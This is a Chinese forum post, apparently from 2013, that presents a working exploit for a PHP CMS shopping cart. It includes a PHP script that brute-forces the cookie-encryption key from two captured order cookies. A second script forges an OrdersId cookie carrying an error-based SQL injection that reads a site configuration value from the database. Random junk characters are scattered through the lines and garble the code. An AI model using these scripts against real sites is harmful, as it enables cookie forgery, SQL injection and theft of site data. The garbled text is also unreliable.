www.xxx.com/plus/search.php?keyword=
& B! k) O; A/ j/ p在 include/shopcar.class.php中. R, ?. A* E2 `
先看一下这个shopcar类是如何生成cookie的
: D4 V, O/ {$ o1 U239 function saveCookie($key,$value)4 _9 _+ h8 }9 O6 o4 m" ], }8 s a; y
240 {! a! Z [9 L$ ^) X
241 if(is_array($value))& R% B* M5 C5 b7 ^
242 {
( i$ G- Z! p- h1 D9 x+ F# m3 s; g: |243 $value = $this->enCrypt($this->enCode($value));
$ F. R! I- C3 M; N" O1 W: Z244 }
- ?& @) N; R/ b245 else
' \; G' Z8 q( p9 J# R1 t& R& ~9 p* k% Q246 {% n8 I6 @9 N; Q2 H6 e* u) G! {
247 $value = $this->enCrypt($value);
, z& H1 k8 t- A. `) d248 }
( I+ U* P( C$ c249 setcookie($key,$value,time()+36000,’/');
7 g% t* f) X/ e0 X4 f. ]1 M250 }
/ ^6 P. b+ I2 \ O) S& h6 _简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数
# O& }7 ?: x* k" B186 function enCrypt($txt): R0 P' ^. x& f7 k$ |* U
187 {: S/ ~& j Y2 ~& ^/ X8 h7 v
188 srand((double)microtime() * 1000000);
1 m; Q) C/ |/ v& w189 $encrypt_key = md5(rand(0, 32000));! b5 y% v) v9 y4 G: [" [6 i
190 $ctr = 0;4 Y6 v5 U$ m6 s0 R' A
191 $tmp = ”;
1 F; F9 q5 @0 r192 for($i = 0; $i < strlen($txt); $i++), ~( S$ `/ h3 \1 a% \' `: L- N
193 {
* x) s# {: K8 Y% h194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;) {) W2 K, M E
195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);" Q2 o: I9 L0 B) \- K, A
196 }
$ r; O- Y' i1 S5 f! t: i* G2 i197 return base64_encode($this->setKey($tmp));
: V- O/ u' V" K b) }4 I; N$ V" N198 }, L- c3 N! h3 B' i9 \
213 function setKey($txt)% u) _% G" j) {0 J
214 {
' g, H. }, Q. o6 H- F2 {$ ?8 @215 global $cfg_cookie_encode;
1 e: E! G4 u* d2 I& g216 $encrypt_key = md5(strtolower($cfg_cookie_encode)); z- K U* J q6 S0 s: i
217 $ctr = 0;. T& F/ F( t! V# g" Y" O
218 $tmp = ”;
3 S6 P4 |! [8 }1 J9 s0 |219 for($i = 0; $i < strlen($txt); $i++)
. j) Y2 ^6 d0 E* W220 {/ n ^5 R ?! B/ j2 C$ f
221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
& y- s! |& k1 V( q% E2 |: b222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];- Z* i. C | B/ c+ a9 X& p0 J
223 }, B' S- ?: Q& G! b
224 return $tmp;
8 Z: w6 n. d! W225 }
& [/ }8 @4 E* e) f+ H) J' GenCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的
. e9 z. ~4 l# }0 M& g/ z然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。. K4 R! q# A$ O* H
具体代码如下:
3 V) {/ N" {& m$ `/ M+ ?<?php) B {$ A0 @, \/ p+ ^+ o# ]
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here$ L- T. b7 h5 S5 M1 e
$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here8 j1 Z1 b) m6 M$ @
$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here# Y: {7 Z, D; s: X4 `
function reStrCode($code,$string)( F* J4 |8 M$ P* J5 s7 \8 M
{. ~% i+ `+ E' p' F9 s
$code = base64_decode($code);
. m0 z- E) J* O9 j, Y$key = “”;
; u: e1 P6 z! ^for($i=0 ; $i<32 ; $i++)! r) U _ U3 e; f4 t j
{
8 A% d' b/ T5 }' t& T8 O9 v$ N$key .= $string[$i] ^ $code[$i];
% |3 g0 s, |6 `+ X( c |9 D+ U/ k, h}" d1 q1 `, Z8 K
return $key;
- S- v: O1 b+ D7 _) Y}+ V0 L- |8 d/ ?1 y# N4 D
function getKeys($cookie,$plantxt)
! {7 p' T9 _/ v{, L" c' v5 s3 ^1 ~2 c' C1 Q/ I
$tmp = $cookie;# O1 e; Y6 j( U7 j! H( V
$results = array();% i" H* i1 X; y2 p* `2 [8 X
for($j=0 ; $j < 32000; $j++)' o! x9 j/ ?+ f3 e& j. }
{7 X7 E' X( o6 c% | j8 l
4 D- { X, m; ]7 ^
$txt = $plantxt;
0 r' q1 M: t% z1 r( m$ctr = 0;* l3 L- y5 s( \* w4 G; q$ \& w" A- a
$tmp = ”;3 P* {& H! M% l1 U8 }2 y6 q
$encrypt_key = md5($j);! S8 @; o$ L2 |" A
for($i =0; $i < strlen($txt); $i ++)
* ?0 _: ~ o) a+ I7 o( O k, S- w{5 Q( y G0 G/ B5 H" p3 ~4 z
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr; e$ z7 R! \$ Z. x% P" [* W3 F/ D
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);8 Q+ }- C- t0 o E7 a* {9 ?
}
( Q% L- z+ T, U. Y3 c: U' `$string = $tmp;
) h* m: [" f. C4 Z) n$code = $cookie;) k) s5 C- j5 _3 \6 J" g
$result = reStrCode($code,$string);
' f% v5 e8 s. T: tif(eregi(‘^[a-z0-9]+$’,$result))
! C! K4 Z+ l0 D* t6 O6 d{
8 m& V" e- `& A. [echo $result.”\n”;
, }0 \7 W Z, N0 a$results[] = $result;1 a3 J6 x7 t- a& i; x
}+ M0 i6 w' I4 R0 h. M" \& D
} ? H* D2 z8 P4 R+ n
return $results;
' }% y' r" z4 e* x9 h}
) N5 k0 Z2 K4 C$results1 = getKeys($cookie1,$plantxt);
% F! Q* l. i* T; E" q$ v/ X8 o: d$results2 = getKeys($cookie2,$plantxt); [5 n. s( p [
print “\n——————–real key————————–\n”;7 K( ~3 m5 F5 @" [4 o) U0 V9 }
foreach($results1 as $test1)
8 \8 B. P4 z, b' ]% v1 I, l; l2 r{
) A1 z! {2 F& Pforeach($results2 as $test2)
" D7 e E' p2 W0 }; a: _( m{
" n; M+ V* J" w n$ `if($test1 == $test2)
: _- k5 ?3 X' N7 G6 z, c. r{1 R0 ~( m8 a7 i. i: \0 q3 m
echo $test1.”\n”;9 J9 C% ~+ B& Q9 L z5 a. k
}
3 q0 c C) `# ?/ d. Q( O7 X}
# {0 x( e. _9 e2 r. ~0 @/ Y0 Q/ {}3 u# n3 }1 `9 s8 d/ {
?> f% f, j4 A# L
cookie1 和 cookie2 是我下了两次订单后分别生成的cookie,5 g. E: B S6 D* i. r
plantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1+ s; L5 O5 B9 a7 [
然后推算出md5(strtolower($cfg_cookie_encode))7 v" c2 k5 N. c
得到这个key之后,我们就可以构造任意购物车的cookie
3 k% G7 R7 P) |5 W; s接着看
3 j0 I) b: ]" g' r20 class MemberShops
' m# o2 |5 L* c9 u21 {
; `1 [) B2 Z. ]) |22 var $OrdersId;, }& ]" |: R$ [2 t
23 var $productsId;
0 `7 H$ J8 P8 M- B6 a24+ \1 l0 M1 K0 ~0 n/ d0 x1 A8 e
25 function __construct()( B5 A/ j# K( V# X
26 {
8 N9 u: k8 b5 L27 $this->OrdersId = $this->getCookie(“OrdersId”);
" T- K: Q0 e+ \28 if(empty($this->OrdersId))4 r. H9 ?9 @2 i5 W
29 {
7 l- s* l. ? e r4 _( l8 v' i. Y30 $this->OrdersId = $this->MakeOrders();3 H) E) ]. Z6 N' U$ M
31 }. Q5 x" I+ I! i
32 }/ U; F2 Y1 p. k' y0 E7 H | t
发现OrderId是从cookie里面获取的
- i' c; F" }: }! f! m9 l然后
2 f$ B9 b% Q7 u. C) b8 [- S( h/plus/carbuyaction.php中的' T/ h/ i/ J3 q! Z7 r/ o% { ^
29 $cart = new MemberShops();8 \- B7 N$ u% U+ f
39 $OrdersId = $cart->OrdersId; //本次记录的订单号
" ^; N1 ^7 _* B& E! a9 q# S- V" h……" k% v" w- M% D" ]9 f7 e$ @
173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
, y7 D5 K/ ]% x8 ?接着我们就可以注入了
0 ?8 u% _ k g/ S" y; ?* x通过利用下面代码生成cookie:
6 G C' O' I! K<?php
& N/ Z, l, b$ ]1 z/ t$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
0 y0 c; N) p' m; T$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
$ |$ U3 [, H _$ X1 H8 Sfunction setKey($txt)7 o, Z! U: A) A( `9 }
{- p6 V# x2 }+ y
global $encrypt_key;
5 U- ?; o3 o( E7 S$ctr = 0;
4 b4 D9 K" Q, G0 X; W8 [$tmp = ”;! r: |9 ]( E& P# a
for($i = 0; $i < strlen($txt); $i++)8 b" I3 d3 g. \6 Y
{
8 Y9 b7 w4 B5 G$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
. g& l1 y9 b( H7 A0 W4 M$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];7 e0 C& ^" L* p9 Q( g I F
}; ?' x# @+ h: \6 B
return $tmp;" p+ [2 K$ ^0 w' E% k# n: c+ _1 r
}! h8 i+ p' C% N. f. f7 S9 L
function enCrypt($txt)& ^# W, _0 B! _5 {
{4 \! G7 h# u0 u3 c
srand((double)microtime() * 1000000);
, q( U n; k4 P2 y- i% S' l: Q. @$encrypt_key = md5(rand(0, 32000));
- m2 i& c; O/ f$ctr = 0;0 e! |5 q6 v$ \- V: n
$tmp = ”;) q P- t7 V! T5 m6 R8 e
for($i = 0; $i < strlen($txt); $i++)- D" t3 \/ R7 e( [( t1 d" V7 T5 Z. C
{
+ }/ _2 d+ Y$ R! f+ _9 k$ K+ h1 l$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;1 p3 V% ~( D# K. U: _" W8 W/ `% g
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);4 S" k: }4 U4 u
}, U9 X" @7 u: z9 d4 X$ Y
return base64_encode(setKey($tmp));
9 b b0 g4 [9 E4 F}) Y( o* }/ U+ F
for($dest =0;$dest = enCrypt($txt);)
( j+ x c% D. h* q. w{
) N2 j8 ^$ [7 d' s8 ^5 Wif(!strpos($dest,’+')): u5 Q0 R/ c0 \9 F6 I
{
( [. p; w5 L* L, q+ Z6 y" H& Obreak;
; f1 t* }7 u& w" ^- N T}' q6 a; D A7 ? S* `
}
: G J% N( m# _echo $dest.”\n”;
8 I7 |- J, R: d?>
s" s* g+ v7 U# r
0 r7 Y3 I% ^3 e% a9 ?9 X |
发表于 2013-2-13 23:58:29
收藏
支持
反对